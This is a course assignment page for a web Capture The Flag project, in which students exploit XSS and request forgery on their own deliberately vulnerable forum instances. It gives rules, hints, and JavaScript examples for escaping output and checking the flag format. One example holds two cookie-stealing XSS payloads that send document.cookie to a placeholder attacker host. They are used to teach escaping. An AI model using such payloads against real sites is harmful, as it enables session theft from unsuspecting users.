Project 7: Web CTF
- This project is due at 11:59pm on Wednesday, Dec 4, 2024. This is a firm deadline: because the semester is ending, there can be no late submissions.
Description and Deliverables
In this project, you will gain hands-on experience leveraging web and browser-based exploits to make a web service do unexpected things. Like the previous one, this project is structured as a Capture The Flag (CTF), a common format in cybersecurity competitions. You will be given access to a vulnerable website, and your task is to locate eight flags hidden in it.
To receive full credit for this project, you will turn in a single file:
- A file named project7/flags.txt that contains the flags that you will capture from the site.
The exact format of this deliverable is described in detail below.
Getting Started with cynews
The flags are located on a discussion forum for cy2550. Each of you has your own instance of this website hosted at <yourgithub>.p7.neucrypt.org. For example, my site is located at https://abhvious.p7.neucrypt.org.
- You must first log in to the site. Only authorized users with valid logins can see the content of your site. There are only two users on each site: you and the admin account. To retrieve your login credentials, you will need to decrypt a GPG-encrypted message posted on Piazza. We will download the GPG key that you uploaded to your GitHub account in project 5. (Many of you did not do that step, so please do it now.)
- There are no flags on the login page. All of the flags can be found by inspecting and interacting with the pages available to you after login.
- Learn how the site works by posting new questions on the site and new comments on those posts. Inspect the Debug console to see how posting works. Inspect the source of the page. Play with the options available to you as the creator of a post. Learning how the site works will help you find the flags. You can find basic JavaScript tutorials with a few searches, but you only need the few JavaScript skills that we demonstrated and practiced in the class exercise. Some behaviour may be unlocked as you interact with the site, so keep playing with it.
- Finding the flags increases in difficulty as you progress through the project. The first few flags require some attention to detail and clever thinking about how the site is designed, and about what you should and should not be able to do.
- As mentioned, a key tool for this project is your browser's Developer Tools. They show you the source code of the website and every file and resource the site requests, among other useful things. Tools like Postman and Burp Suite are used in real-world engagements, but the Developer Tools will be the easiest and most accessible option for most students.
- Don't get stuck. Try stuff. One of the main points of security is to be curious and learn how systems work.
Identifying Flags
Your goal is to locate the flags hidden throughout the site.
All flags have the following format:
flag#:<64 characters of digits and letters a-f>
For example, a secret flag might look like this:
flag1:d1bc8d3ba4afc7e109612cb73acbdddac052c93025aa1f82942edabb7deb82a1
The secret flags can be anywhere within the website: inside the source code, inside headers sent between the browser and the server, inside databases stored on the server, behind XSS, etc. It is 100% feasible to find all flags; none has been hidden in a way that requires wizard-level exploitation skills, or hashcat, to locate.
Note: All flags are unique per user.
Hints
Some of the flags may require you to perform a cross-site scripting (XSS) attack. The very last flag requires you to perform a same-site request forgery attack. In particular, this flag does not appear under your login. Instead, it appears when the admin user logs in.
You naturally do not have the admin user's login. However, an automated robot that does have the admin credentials for your site will periodically visit the top few posts on your site. Perhaps you are able to exploit a vulnerability in the site that causes this flag to be leaked to you. As a hint, recall the XSRF, or cross-site request forgery, example that was discussed in lecture. Through a vulnerability in this site, you can perhaps inject a JavaScript attack that causes the admin to inadvertently leak a secret to you.
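To make the hint above concrete, here is an added example, written for this page and not code from cynews or the course, of why a stored post can attack whoever views it, including an account that is not yours. The template functions, field names and the attacker host are hypothetical; the page does not describe how cynews actually renders posts or what the admin's browser can be made to leak. The payload is the textbook cookie-reporting pattern, used only to show that an unescaped post body ends up as live markup in the viewer's browser, while HTML-escaping turns the same body into inert text:

```javascript
// Added example: stored XSS as a rendering bug. Hypothetical template
// functions; cynews's real templates and routes are not known from the page.

// Escape the five characters that can break out of HTML text or attribute
// context. Sufficient for text nodes and quoted attributes, not for
// <script> bodies, URLs or CSS, which need context-specific encoding.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable: the stored post body is concatenated straight into the page,
// so any markup the author typed is interpreted by every reader's browser.
function renderPostUnsafe(post) {
  return `<article><h2>${post.title}</h2><p>${post.body}</p></article>`;
}

// Hardened: each untrusted field is escaped before it reaches the markup.
function renderPostSafe(post) {
  return `<article><h2>${escapeHtml(post.title)}</h2><p>${escapeHtml(post.body)}</p></article>`;
}

// Stand-in for "would a browser execute script here?": is there a live
// <script> tag or an inline on*= event handler left in the output?
const ACTIVE_SCRIPT_RE = /<script\b|<[a-z][^>]*\son[a-z]+\s*=/i;
function containsActiveScript(html) {
  return ACTIVE_SCRIPT_RE.test(html);
}

// Constructed sample posts (not from the site). The first carries the classic
// payload: when the page is viewed, the viewer's own browser sends its cookie
// to a host the attacker controls. attacker.invalid is a placeholder.
const scriptPost = {
  title: "Help with project 7?",
  body: '<script>new Image().src="https://attacker.invalid/?c="+encodeURIComponent(document.cookie)</script>',
};
// Same idea without a <script> tag, using an event handler on a broken image.
const handlerPost = {
  title: "Anyone else seeing this?",
  body: '<img src="x" onerror="fetch(\'https://attacker.invalid/?c=\'+document.cookie)">',
};

for (const post of [scriptPost, handlerPost]) {
  console.log("unsafe render leaves script live:", containsActiveScript(renderPostUnsafe(post)));
  console.log("safe render leaves script live:  ", containsActiveScript(renderPostSafe(post)));
}
```

The regex is only a stand-in for a browser; on the real site you confirm the same thing by watching the Network tab of the Developer Tools while a post is viewed. The injected script runs in the viewer's origin, which is what makes the forgery same-site: whatever the admin's browser can read or fetch, the script can fetch and relay. Whether document.cookie is the secret that matters in cynews is not stated on the page; an HttpOnly cookie, for instance, is not readable this way.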
Rules
To make this assignment fun for everyone, we ask that students obey some basic rules of decorum.
-
To keep the site private within the class, we ask you do not share the URL of the website with people outside of this class.
-
Only log in to your own instance. Do not log in to another student's instance. Do not attack your classmates.
-
Do not launch denial-of-service attacks against the server. Examples of denial of service include, but are not limited to: intentionally running large numbers of processes to consume CPU and memory, flooding the server with network traffic, and scraping the website. Do not scrape the website.
-
This website is intentionally vulnerable. This means you will have the power to do destructive things that (hopefully) you could not do on a normal site. Do not perform any destructive actions that would harm the integrity of the backend server or database. If you find a vulnerability that does not eventually lead you to a flag and has the potential to be destructive, let the course staff know ASAP.
Any student that fails to follow these rules, i.e. intentionally attempts to make mischief, will receive a zero on the assignment. That said, we understand that mistakes happen! If you accidentally make changes to accounts that you believe may hinder others’ abilities to complete the assignment, let us know immediately and we will repair the situation.
Submission details
To receive full credit on this assignment, you must turn in a single (ASCII formatted with Unix-style line breaks) text file named flags.txt that contains the flags that you have recovered.
You should create a file named flags.txt that contains your captured flags. Each flag should be on its own line. For example, your flags.txt file might look like the following:
flag0:e09f9656f306b645e9877dd9aa84d1957447effe49abea0a4400000000000000
flag1:d1bc8d3ba4afc7e109612cb73acbddeac052c93025aa1f82942edabb7deb82a1
flag2:de0b9a001c104c5bef8bc23afe379de3cd657bfcee00f7aa0829d0ed1e457106
flag3:0ac837a51686ab59ab1a3894fa910ee58dd597ed18cba114cd2a28bb05b8b6d9
flag4:f7530598a6ced26e95e8364fa64cdbe6cd24a499d12f4a923b5c48e1abc0f9ca
flag5:4bcfc21affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a440000
flag6:21affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a44000000000
flag7:affe09f9656f306b645e9877dd9aa84d1957447effe49abea0a4400000000000
Submit your project7/flags.txt via a signed GitHub commit, then submit the repository to Gradescope.
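The flag pattern from "Identifying Flags" and the flags.txt rules in this section (ASCII, Unix line breaks, one flag per line, eight flags) are mechanical enough to check with a short script before you commit. The following is an added example written for this page, not course tooling: findFlags pulls well-formed flags out of any text you paste into it (page source, a header dump, a JSON response), and validateFlagsTxt reports anything about a flags.txt body that the grading rules would penalise. The flag number is matched as any run of digits, since the page only writes it as "flag#". The sample inputs are constructed and the hashes in them are filler, not real flags.

```javascript
// Added example for this page: find flags in captured text and check a
// flags.txt body against the submission rules. Not part of the course tooling.

// Flag format from the assignment: "flag" + number + ":" + 64 lowercase hex
// characters. The trailing \b keeps a prefix of a longer hex run from matching.
const FLAG_RE = /\bflag(\d+):([0-9a-f]{64})\b/g;

// Extract every well-formed flag from arbitrary text (page source, response
// headers, a JSON body, console output). Returns [{ num, flag }] in order of
// first appearance, de-duplicated.
function findFlags(text) {
  const seen = new Set();
  const out = [];
  for (const m of text.matchAll(FLAG_RE)) {
    const flag = `flag${m[1]}:${m[2]}`;
    if (seen.has(flag)) continue;
    seen.add(flag);
    out.push({ num: Number(m[1]), flag });
  }
  return out;
}

// Check a flags.txt body: ASCII only, LF line breaks, one well-formed flag per
// line, no repeats, expectedCount distinct flags. Returns the list of
// problems; an empty list means the file is acceptable.
function validateFlagsTxt(content, expectedCount = 8) {
  const problems = [];
  if (/[^\x00-\x7f]/.test(content)) problems.push("file contains non-ASCII bytes");
  if (content.includes("\r")) {
    problems.push("file uses CR or CRLF line breaks; use Unix LF");
    content = content.replace(/\r\n?/g, "\n"); // normalise so the per-line checks still make sense
  }
  const lines = content.split("\n");
  if (lines.length && lines[lines.length - 1] === "") lines.pop(); // allow one trailing newline
  const nums = new Set();
  lines.forEach((line, i) => {
    const m = /^flag(\d+):([0-9a-f]{64})$/.exec(line);
    if (!m) {
      problems.push(`line ${i + 1} is not of the form flag#:<64 hex chars>: ${JSON.stringify(line)}`);
      return;
    }
    if (nums.has(m[1])) problems.push(`line ${i + 1} repeats flag${m[1]}`);
    nums.add(m[1]);
  });
  if (nums.size !== expectedCount) {
    problems.push(`expected ${expectedCount} distinct flags, found ${nums.size}`);
  }
  return problems;
}

// Constructed sample of places the assignment says flags can hide: an HTML
// comment, a response header, a JSON field. H is 64 hex characters of filler.
const H = "0123456789abcdef".repeat(4);
const capturedText = [
  `<!-- TODO remove before release: flag0:${H} -->`,
  `X-Debug-Token: flag1:${"f".repeat(64)}`,
  `{"note":"flag2:${"a".repeat(64)}","decoy":"flag2:${"a".repeat(63)}"}`, // decoy is one char short
  `FLAG3:${H}`, // wrong case, not a flag
].join("\n");

// Constructed flags.txt body in the correct shape (filler hashes, not real flags).
const goodFlagsTxt =
  Array.from({ length: 8 }, (_, i) => `flag${i}:${String(i).repeat(64)}`).join("\n") + "\n";

console.log(findFlags(capturedText).map((f) => f.flag));
console.log("problems with good file:", validateFlagsTxt(goodFlagsTxt));
console.log("problems with CRLF file:", validateFlagsTxt(goodFlagsTxt.replace(/\n/g, "\r\n")));
```

Run it with node, or paste the two functions into the Developer Tools console and call findFlags on document.documentElement.outerHTML or on text copied from the Network tab. Before committing, run validateFlagsTxt on the exact bytes of project7/flags.txt; an editor that saves CRLF or a stray non-ASCII character is enough to lose points under the grading rules.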
Submitting
Please follow these directions exactly:
- Create a directory project7 under your git repo.
- Add the file flags.txt to this directory.
- Commit your new file in a signed commit. Feel free to resubmit the project as many times as you like. It is ok to have extra files in the repository as well; just make sure you have this one.
Note: We require you to follow these directions exactly. If your repository does not include the project7/flags.txt file as described above, you will lose points, and possibly receive no credit.
Grading
This project is worth 100 points:
- 19 points per flag for the first 4 flags
- 5 points per flag for the last 4 flags
- 4 points for signing your commit
Points can be lost for turning in files in incorrect formats (e.g. not UNIX-line break ASCII), failing to follow specified formatting and naming conventions, or encrypting/signing your file using the wrong keys.
Tips
CTF projects are puzzles: they’re best when students are allowed to figure things out for themselves. Thus, we’re reluctant to post tips openly that would give away key aspects of the game. That said, if you feel stuck, or like you don’t know where to begin, that is okay! Begin by exploring the site using the hints given above.
Think about the types of attacks we have just discussed in class and how they might apply here.